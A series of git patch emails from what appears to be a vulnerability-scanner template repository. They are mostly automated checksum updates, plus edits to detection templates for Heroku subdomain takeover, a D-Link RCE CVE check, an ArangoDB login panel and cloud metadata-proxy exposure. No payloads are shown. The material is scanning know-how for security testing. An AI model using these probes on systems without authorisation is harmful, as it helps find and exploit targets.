-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee +http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c +http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 +http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f +http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 +http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c +http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 +http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce +http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 +http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b +http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b +http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 +http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 +http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 +http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 +http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -5925,7 +5925,7 @@ http/vulnerabilities/other/bitrix-open-redirect.yaml:6f0113de78d452fb4a341006c23 http/vulnerabilities/other/blue-ocean-excellence-lfi.yaml:aa0987355d4e0be64da046ce56a7a35a1ef4efc4 http/vulnerabilities/other/brightsign-dsdws-ssrf.yaml:8d97a878f3c1ac1f56fd85ca2867c96288295d95 http/vulnerabilities/other/bullwark-momentum-lfi.yaml:eaa083dbd811d1e5b28da37af20752efc7448e30 -http/vulnerabilities/other/cacti-weathermap-file-write.yaml:e77c12b91e28d32cba3d549d708fa1ff1fa370e5 +http/vulnerabilities/other/cacti-weathermap-file-write.yaml:6addf113956d50c5f2fbe9e749f9f0d1cedfe80c http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:7aed8bd72c7523de52fa3e9758c151833e056d94 http/vulnerabilities/other/carrental-xss.yaml:0c44fad01c1d4e64af99945d72a1dea0aa04c970 http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:58afeb493d09acc7de94967327ff5cb680422d2f @@ -6492,7 +6492,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:399b728b87a1ac1824146319621c48ac9c65225b +templates-checksum.txt:fe06832dc950dde5c0158d0f1e9afbd3589694da wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3e3bc2e7688261acb4262e7bc3f17e3d1e59230d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 4 Jul 2023 11:15:03 +0530 Subject: [PATCH 321/609] Update CVE-2018-6530.yaml --- http/cves/2018/CVE-2018-6530.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 56278bc323..9b94c3eb43 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -28,6 +28,7 @@ requests: whatever-content + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction From d7782805f684cf1fd19e36676c9c078642866089 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 05:45:53 +0000 Subject: [PATCH 322/609] TemplateMan Update [Tue Jul 4 05:45:53 UTC 2023] :robot: --- http/miscellaneous/addeventlistener-detect.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/miscellaneous/addeventlistener-detect.yaml b/http/miscellaneous/addeventlistener-detect.yaml index 94457cb4f0..a80a11cc8c 100644 --- a/http/miscellaneous/addeventlistener-detect.yaml +++ b/http/miscellaneous/addeventlistener-detect.yaml @@ -11,6 +11,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + metadata: + max-request: 1 tags: xss,misc http: From 1a41da068741e7049abc4a636eea98d376fc3f98 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 4 Jul 2023 11:21:18 +0530 Subject: [PATCH 323/609] Update heroku-takeover.yaml --- http/takeovers/heroku-takeover.yaml | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/http/takeovers/heroku-takeover.yaml b/http/takeovers/heroku-takeover.yaml index 0e656470d0..4a6465acd9 100644 --- a/http/takeovers/heroku-takeover.yaml +++ b/http/takeovers/heroku-takeover.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/38 - tags: takeover,heroku metadata: max-request: 1 + tags: takeover,heroku http: - method: GET @@ -24,5 +24,9 @@ http: - type: word words: - "herokucdn.com/error-pages/no-such-app.html" + + - type: word + words: + - "No such app" - "Heroku | Application Error" - condition: and + condition: or From 907a265efcefc268451d5c9fb47522620119ed8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 05:59:31 +0000 Subject: [PATCH 325/609] Auto Generated Templates Checksum [Tue Jul 4 05:59:31 UTC 2023] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 630de26133..a6a30b561e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3799,7 +3799,7 @@ http/iot/webcamxp-5.yaml:34b662576e2efdd2ddaef5267512848b8159f3e0 http/iot/webtools-home.yaml:8fac1b9a4c40b7a99a33895c75dcd2be623e1965 http/iot/xp-webcam.yaml:6a17a29da87ffe3b4a382c6ed2e4ca38c148e54e http/iot/zebra-printer-detect.yaml:3ac7d5f177a91a5ee89411ead8e073a72a10997e -http/miscellaneous/addeventlistener-detect.yaml:23e4444e90c97c5a5a0ae9a0c7da3a62923d258d +http/miscellaneous/addeventlistener-detect.yaml:49f913e72df50e18eb80458c9fbb5df10d4253b6 http/miscellaneous/apple-app-site-association.yaml:c6da929223cda667179226cfba083fc9692c7dac http/miscellaneous/aws-ecs-container-agent-tasks.yaml:169fca1a43acbc9c877b9c0c3df0141f2400d67e http/miscellaneous/clientaccesspolicy.yaml:d2ebcdf18a9e115d28ec5418618dde3de28439b6 @@ -4942,7 +4942,7 @@ http/takeovers/hatenablog-takeover.yaml:3bea61c75c93fadd502f1b90da8a0ad0a4200f97 http/takeovers/helpjuice-takeover.yaml:6d3e8093b7f2f98c75d9f5b60c002c95fc8878f5 http/takeovers/helprace-takeover.yaml:8cee0974f6eba201e9b9714ad2ab8481b730e7aa http/takeovers/helpscout-takeover.yaml:89b05e71d502a71908e92334e64415b2c949648b -http/takeovers/heroku-takeover.yaml:3e2d4043ed8b60e14fbd96a0e71ec6eb864f9b7d +http/takeovers/heroku-takeover.yaml:b390cfa75e65349027d64567cc1d80ca73712275 http/takeovers/hubspot-takeover.yaml:292b826f08414788ef5d1a8da99554399779f8be http/takeovers/intercom-takeover.yaml:dfbfaf2e231f0beaa20e086dbeb30e2c005e8ab3 http/takeovers/jazzhr-takeover.yaml:cba2cedd7a05467b089ecfa10acc96eb3b8d875e @@ -6492,7 +6492,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:fe06832dc950dde5c0158d0f1e9afbd3589694da +templates-checksum.txt:fc28cc0f0b6529ee2cc1ff36026977b9d0533416 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 6fa7d0647d2b341bc18a705ed5917e4282b4116a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 06:05:29 +0000 Subject: [PATCH 326/609] Auto Generated New Template Addition List [Tue Jul 4 06:05:29 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ddf70e71bd..7a65ff4a4c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ file/webshell/asp-webshell.yaml file/webshell/jsp-webshell.yaml file/webshell/php-webshell.yaml +http/cves/2018/CVE-2018-6530.yaml http/cves/2023/CVE-2023-28121.yaml http/exposed-panels/dell-idrac.yaml http/exposed-panels/pritunl-panel.yaml From 66547b7c3c4207c3ee7a682ae075cff381af5a5c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 06:05:46 +0000 Subject: [PATCH 327/609] Auto Generated Templates Checksum [Tue Jul 4 06:05:46 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a6a30b561e..92abd3664c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -999,6 +999,7 @@ http/cves/2018/CVE-2018-5715.yaml:edc2f38d70de407c89d33d610a4f169c95b15f7e http/cves/2018/CVE-2018-6008.yaml:a987b95a8dd68fcd3af8a33426f9f8afd14c8315 http/cves/2018/CVE-2018-6184.yaml:72601ef579ce46fa8472b6d7a097e337c234dc2b http/cves/2018/CVE-2018-6200.yaml:da7db6b26a2e9294990541137180f2454d46a962 +http/cves/2018/CVE-2018-6530.yaml:a96b8ec9bce79cb74a3285e981807e6609349390 http/cves/2018/CVE-2018-6910.yaml:5844c1b4b62815cd864083d03d1b96f50d5b3f26 http/cves/2018/CVE-2018-7251.yaml:e963d26ff0a3d7a95ce353d9e58b487d1de31254 http/cves/2018/CVE-2018-7422.yaml:96c1ce327c3b749037553b6a469e1af75755cb12 @@ -6492,7 +6493,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:fc28cc0f0b6529ee2cc1ff36026977b9d0533416 +templates-checksum.txt:2bd94c0ad412fcd7fd1d78d173153f439a834ea0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 7313d259f08583838147e77cef1359f2e90172b4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 06:06:54 +0000 Subject: [PATCH 328/609] TemplateMan Update [Tue Jul 4 06:06:54 UTC 2023] :robot: --- http/cves/2018/CVE-2018-6530.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index 9b94c3eb43..f484e4fc6e 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -15,6 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-6530 cwe-id: CWE-78 + metadata: + max-request: 1 tags: cve,cve2018,d-link,rce,oast,unauth requests: From df4003c0a31538d4c3f21981d32112b8903c384d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 4 Jul 2023 12:27:36 +0530 Subject: [PATCH 329/609] Add files via upload --- .../arangodb-web-Interface.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/exposed-panels/arangodb-web-Interface.yaml diff --git a/http/exposed-panels/arangodb-web-Interface.yaml b/http/exposed-panels/arangodb-web-Interface.yaml new file mode 100644 index 0000000000..a58dcc6c08 --- /dev/null +++ b/http/exposed-panels/arangodb-web-Interface.yaml @@ -0,0 +1,32 @@ +id: arangodb-web-interface + +info: + name: ArangoDB Web Interface - Detect + author: pussycat0x + severity: info + description: | + ArangoDB Web Interface was detected. + reference: + - https://www.arangodb.com/docs/stable/ + metadata: + verified: "true" + shodan-query: http.title:"ArangoDB Web Interface" + tags: panel,arangodb + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/_db/_system/_admin/aardvark/index.html" + + host-redirects: true + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "ArangoDB Web Interface" + + - type: status + status: + - 200 \ No newline at end of file From 048286f9fe65a6944dc7e57f9e4f7e76e4cac641 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 4 Jul 2023 12:29:34 +0530 Subject: [PATCH 330/609] fixed lint --- http/misconfiguration/proxy/metadata-aws.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index 4778cd9862..5d560b9b74 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -24,7 +24,6 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. tags: exposure,proxy,aws,amazon,misconfig,metadata metadata: max-request: 4 From e6a4779dc0f58c03ae70c2d3440f785e7b47a699 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Tue, 4 Jul 2023 12:33:49 +0530 Subject: [PATCH 331/609] fixed error --- http/misconfiguration/ibm-websphere-xml.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/misconfiguration/ibm-websphere-xml.yaml b/http/misconfiguration/ibm-websphere-xml.yaml index 4ad719538b..1dca452728 100644 --- a/http/misconfiguration/ibm-websphere-xml.yaml +++ b/http/misconfiguration/ibm-websphere-xml.yaml @@ -12,7 +12,6 @@ info: max-request: 1 verified: true tags: ibm,websphere,exposure,misconfig - verified: true http: - method: GET From b7ff8e0465ff4c77a4c4c28d746ad4ab19bbe762 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 4 Jul 2023 12:51:06 +0530 Subject: [PATCH 332/609] fix template --- http/exposed-panels/arangodb-web-Interface.yaml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/http/exposed-panels/arangodb-web-Interface.yaml b/http/exposed-panels/arangodb-web-Interface.yaml index a58dcc6c08..eb54210349 100644 --- a/http/exposed-panels/arangodb-web-Interface.yaml +++ b/http/exposed-panels/arangodb-web-Interface.yaml @@ -11,22 +11,19 @@ info: metadata: verified: "true" shodan-query: http.title:"ArangoDB Web Interface" - tags: panel,arangodb + tags: panel,arangodb,login http: - method: GET path: - - "{{BaseURL}}" - "{{BaseURL}}/_db/_system/_admin/aardvark/index.html" - host-redirects: true - stop-at-first-match: true matchers-condition: and matchers: - type: word words: - - "<title>ArangoDB Web Interface" + - "<title>ArangoDB Web Interface" - type: status status: - - 200 \ No newline at end of file + - 200 From b1d3dfc528032dd29a421ed9bc1862ccd6148713 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jul 2023 07:41:37 +0000 Subject: [PATCH 334/609] Auto Generated Templates Checksum [Tue Jul 4 07:41:37 UTC 2023] :robot: --- templates-checksum.txt | 460 ++++++++++++++++++++--------------------- 1 file changed, 230 insertions(+), 230 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 92abd3664c..801c7a287f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -999,7 +999,7 @@ http/cves/2018/CVE-2018-5715.yaml:edc2f38d70de407c89d33d610a4f169c95b15f7e http/cves/2018/CVE-2018-6008.yaml:a987b95a8dd68fcd3af8a33426f9f8afd14c8315 http/cves/2018/CVE-2018-6184.yaml:72601ef579ce46fa8472b6d7a097e337c234dc2b http/cves/2018/CVE-2018-6200.yaml:da7db6b26a2e9294990541137180f2454d46a962 -http/cves/2018/CVE-2018-6530.yaml:a96b8ec9bce79cb74a3285e981807e6609349390 +http/cves/2018/CVE-2018-6530.yaml:6e7e80783d4ea1cbc800478c36a743452b99ab21 http/cves/2018/CVE-2018-6910.yaml:5844c1b4b62815cd864083d03d1b96f50d5b3f26 http/cves/2018/CVE-2018-7251.yaml:e963d26ff0a3d7a95ce353d9e58b487d1de31254 http/cves/2018/CVE-2018-7422.yaml:96c1ce327c3b749037553b6a469e1af75755cb12 @@ -2493,7 +2493,7 @@ http/exposed-panels/appwrite-panel.yaml:40dae5138e0278eb81207a973e23cac840698246 http/exposed-panels/aptus-panel.yaml:29b3f8d2e0b74c8e8b9f8d56fb423a1fc967352c http/exposed-panels/aqua-enterprise-panel.yaml:3cc8efaa89d82293c1f36c6c270953884f7fc8ff http/exposed-panels/arcgis/arcgis-panel.yaml:d3868325015954e4185168103932f7bf4351aa80 -http/exposed-panels/arcgis/arcgis-rest-api.yaml:4d9a0f2ecb296da8faf516ddd36821beb0367e38 +http/exposed-panels/arcgis/arcgis-rest-api.yaml:13a24d8cae266f0262519f7aebef401b46ee0746 http/exposed-panels/arcgis/arcgis-services.yaml:82ce551d279a9d6c531a18f099e2046f9e3594ea http/exposed-panels/arcgis/arcgis-tokens.yaml:45cf23e074e3f7228b94416a19f8d1551fd4c664 http/exposed-panels/archibus-webcentral-panel.yaml:1387b64acd9b5192e4525d83db62f7ff4320852b @@ -2513,8 +2513,8 @@ http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml:9329fdf249928f1c70 http/exposed-panels/aviatrix-panel.yaml:3edb69e110d78955d07d909716156b7eedda5abe http/exposed-panels/avigilon-panel.yaml:4ba62f317d1197520015f6b2ffaa046c4f7dfb04 http/exposed-panels/avtech-avn801-camera-panel.yaml:d35d0a56835151f1ed24125618cb53c150975c1a -http/exposed-panels/avtech-dvr-exposure.yaml:d6ed6635ca2472ff1c22d0f00cdcc2aaa67687f0 -http/exposed-panels/aws-ec2-autoscale.yaml:b76e95d24d6d4a0436f23be3bc4f28f3bb0b3ad1 +http/exposed-panels/avtech-dvr-exposure.yaml:b81a524fb35a09cdd65b3b411029dc99e5a581b2 +http/exposed-panels/aws-ec2-autoscale.yaml:8777100bfb5a433890ca428f611a1db17ffc34fc http/exposed-panels/aws-opensearch-login.yaml:46536e274bff029c43e60fa4b38d2c1780eac172 http/exposed-panels/axel-webserver.yaml:0a2bb06cc9d4ae8a1a95982ee0723da93985e4b6 http/exposed-panels/axigen-webadmin.yaml:29bfef44e40fc7e4f8e07c32fe35e54e7bb18010 @@ -2547,15 +2547,15 @@ http/exposed-panels/bomgar-login-panel.yaml:e7ff6af9c5839acb61c4c67bb6fcea57af98 http/exposed-panels/bookstack-panel.yaml:5c4411b487396ba15c6fd72dc63aa7c62083b63b http/exposed-panels/buddy-panel.yaml:bab19682c24c4752a28fd22e16f8133a3672c542 http/exposed-panels/buildbot-panel.yaml:05ff5ee1c58065054a977e697e4b8e1cb9310d93 -http/exposed-panels/c2/brute-ratel-c4.yaml:447567d4f0e1196b2a2bde0818656fb90b88b57e -http/exposed-panels/c2/covenant-c2.yaml:f025c38671d89902947f6bbae1fca4003ee419f4 -http/exposed-panels/c2/deimos-c2.yaml:3716d444d35ef524aa1e2fa9d01d7fe231d9fe8a -http/exposed-panels/c2/empire-c2.yaml:bdb641d0ba18bd25991dc88efdb258adb0bd3ac4 -http/exposed-panels/c2/evilginx.yaml:efdf2db2dc7b31fc2242f12654d189457fd08142 -http/exposed-panels/c2/mythic-c2.yaml:a02f3ff5c7d9372ef81dfc9a666727e5fab527f2 -http/exposed-panels/c2/nh-c2.yaml:4c2e40ce9f86b44749858f3b86d810c644ad1401 -http/exposed-panels/c2/viper-c2.yaml:a8f50bb1dd4884c0263704cf8276779afb5564c1 -http/exposed-panels/cacti-panel.yaml:70b17ae1560874233ecbea0fd95a55b5b2e8cbfb +http/exposed-panels/c2/brute-ratel-c4.yaml:8c9d3614fe8a98637475e62043728bdcc14e0cbf +http/exposed-panels/c2/covenant-c2.yaml:32db211a75d38e2e5f807b6f63e9a7f4a40d13b2 +http/exposed-panels/c2/deimos-c2.yaml:266a59269734128be0a942812e98d4a9fc7237dc +http/exposed-panels/c2/empire-c2.yaml:68c37a16d8bb6605361cbe6e88824035f48f02be +http/exposed-panels/c2/evilginx.yaml:71ad6eb248a72fe3315d3c28f010130b4bd5257d +http/exposed-panels/c2/mythic-c2.yaml:05a73d58dc669f0fce5b2d15f9f7becfffc1c76c +http/exposed-panels/c2/nh-c2.yaml:98303079db934bddaccc41a2896fa0a144b67290 +http/exposed-panels/c2/viper-c2.yaml:f8ac1add15145d048821e3939c90435972a0025f +http/exposed-panels/cacti-panel.yaml:f7139e8b3fd2434d2e91bfe34ca9a49deb06421b http/exposed-panels/calendarix-panel.yaml:4e25ed8bc1632b96876a4fb3ef1d2b3a803c22b3 http/exposed-panels/call-break-cms.yaml:2d19e724de531b9e8607ae7c1123dcdacd4b8d52 http/exposed-panels/camunda-login-panel.yaml:aa4afca834d0bf65dc141208ad1035bfc956ceb5 @@ -2567,7 +2567,7 @@ http/exposed-panels/ccm-detect.yaml:d6085394a02dd3dd90705551dbce7f8bdfcfaa35 http/exposed-panels/centreon-panel.yaml:f118376bf8e10c96fa7bb93c7576ebc6b480e896 http/exposed-panels/cerebro-panel.yaml:f7a827e8ad0f5800713d5f205517ab5b9bfc1acd http/exposed-panels/checkmk/checkmarx-panel.yaml:b85dcb572f21056dd2d2c7643a1281583aed5b62 -http/exposed-panels/checkmk/checkmk-login.yaml:56e76bfb0fb6fa06f65edaca6c8d7d542d8b5aeb +http/exposed-panels/checkmk/checkmk-login.yaml:70a8faf58e5e476ba6bb7f02478977d8a83a23d4 http/exposed-panels/checkpoint/ssl-network-extender.yaml:3e8215db9a12fcc5e585706641eb5044ec2bda18 http/exposed-panels/checkpoint-panel.yaml:6db09687cf2fce65c40171db8a60196385508dd1 http/exposed-panels/cisco/cisco-ace-device-manager.yaml:8eab0c59925164899f4b740182f86f27431437a4 @@ -2616,7 +2616,7 @@ http/exposed-panels/couchdb-fauxton.yaml:78e0165964da5864b093a69e3a0f50224c88813 http/exposed-panels/cpanel-api-codes.yaml:256eb94dcf2065470364d2530740f5cfaaef86f7 http/exposed-panels/craftcms-admin-panel.yaml:13aa643c72410e3c04caa627ce834101f2c7f5c8 http/exposed-panels/creatio-login-panel.yaml:a118be651a60a7f43df94e246db1dfb3572a0002 -http/exposed-panels/crontab-ui.yaml:d0eb80a754a6ad6f2a0b06dfbfef52d8890f9d9c +http/exposed-panels/crontab-ui.yaml:656b21e48ecad5cd6e0442d7b5538601c372578e http/exposed-panels/crush-ftp-login.yaml:e3ea9e9f76f02e3b4658e92aae6e1717aa8ba9d2 http/exposed-panels/crxde-lite.yaml:152ab7fcbf5cdb4b19dd7b92eeaee50a46bcb2e4 http/exposed-panels/cryptobox-panel.yaml:c68dfe8a30b5ebb97ee6a48ae6b4023365ea75fe @@ -2664,7 +2664,7 @@ http/exposed-panels/eMerge-panel.yaml:e6b779ec85f6ea15d8490622f78307ba929d5b17 http/exposed-panels/earcu-panel.yaml:4680b33172ce468b93eb9defa13bc3dc9bb50d9a http/exposed-panels/eclipse-birt-panel.yaml:18b81d2ea0b3ab529dd65947a962b2b0ee7777e3 http/exposed-panels/ecosys-command-center.yaml:b03b6f6fc246a3f04b040213838a7fdee615f95c -http/exposed-panels/edgeos-login.yaml:a374cabf07f76a5fa4775b2adf06293cfa4730b7 +http/exposed-panels/edgeos-login.yaml:1c77400a2a73bdabd6ab55b7c3c0aa171f65b4a1 http/exposed-panels/eko-management-console-login.yaml:f6a17fdde102d3907652cead2d898c9d92522c3a http/exposed-panels/eko-software-update-panel.yaml:498ae0fbbb4b932746e1a10ccb2794d6f422f738 http/exposed-panels/elemiz-network-manager.yaml:07ee55d78342df88368e93fb67b4b94402b2012b @@ -2674,7 +2674,7 @@ http/exposed-panels/emessage-panel.yaml:50c56e9e32ef8352c336f8a49ba947751096cb29 http/exposed-panels/ems-login-panel.yaml:8fbdffeaa41f8867b90354eb3961228f1b62c075 http/exposed-panels/ems-webclient-panel.yaml:d460ae303275b54f74a07dfdc0be37a5619ad275 http/exposed-panels/entrust-identityguard.yaml:b9af399a8dad97c9c0fa7f80f903bf5b7092847b -http/exposed-panels/eos-http-browser.yaml:86aaef7a82438cd9b2f30ca32af24cc0dc311c02 +http/exposed-panels/eos-http-browser.yaml:461e86a9d99441fe8e7bf6deb7c8d7da2d46d0e5 http/exposed-panels/episerver-panel.yaml:2bc9b6b40d5c771ae7ed2d153e6e7265ac4aa165 http/exposed-panels/epson-access-detect.yaml:e44720496080b335a7f6d3b441bd4ebb0ad23482 http/exposed-panels/epson-projector-detect.yaml:c2de8d1bdac7a6a9a5d5b18aa379c905500fe378 @@ -2740,7 +2740,7 @@ http/exposed-panels/gitlab-detect.yaml:dc313e3f5ec9d4dfb8acb111a7047625cb05d2d0 http/exposed-panels/globalprotect-panel.yaml:b93079cb0b53d6e62930b5375fb99d8568d58130 http/exposed-panels/glowroot-panel.yaml:ef30e9d018ad881d623f5ca31d56098a2a364bd6 http/exposed-panels/glpi-panel.yaml:29c5d8c8bc35156251a5838a64b2495737d4c459 -http/exposed-panels/gnu-mailman.yaml:903e08b77037a25803f400a69bb6f51e4c1fcdc0 +http/exposed-panels/gnu-mailman.yaml:2f73ca18afe27bff2542558d9c790b43a84fc34b http/exposed-panels/go-anywhere-client.yaml:f9ad0f9b9cfbf590a73e8bf7f23896ee017dffb2 http/exposed-panels/goanywhere-mft-login.yaml:152e83f18129569470160a8d66cc2459fb26a10f http/exposed-panels/gocd-login.yaml:4d81a8f40c2e45cb6f3022e257cc5ee2a2222a31 @@ -2759,7 +2759,7 @@ http/exposed-panels/h2console-panel.yaml:a7174e166bd4bc14f10162deffc42c09d2ae8fc http/exposed-panels/hadoop-exposure.yaml:106a1a911e29c7ceadf3aa95ac9cc95055878691 http/exposed-panels/hangfire-dashboard.yaml:c2acf2a76039ee7d6a90c9071fc1b862d2e75665 http/exposed-panels/harbor-panel.yaml:3e670c20230c4b235f88b69d9cfb40336c9fb9c7 -http/exposed-panels/hashicorp-consul-agent.yaml:f96f0c767b1e09916836f79d9f77dee06c8a6ab6 +http/exposed-panels/hashicorp-consul-agent.yaml:9394d4a991f9e382115a8a564cdafc9c3cf608d7 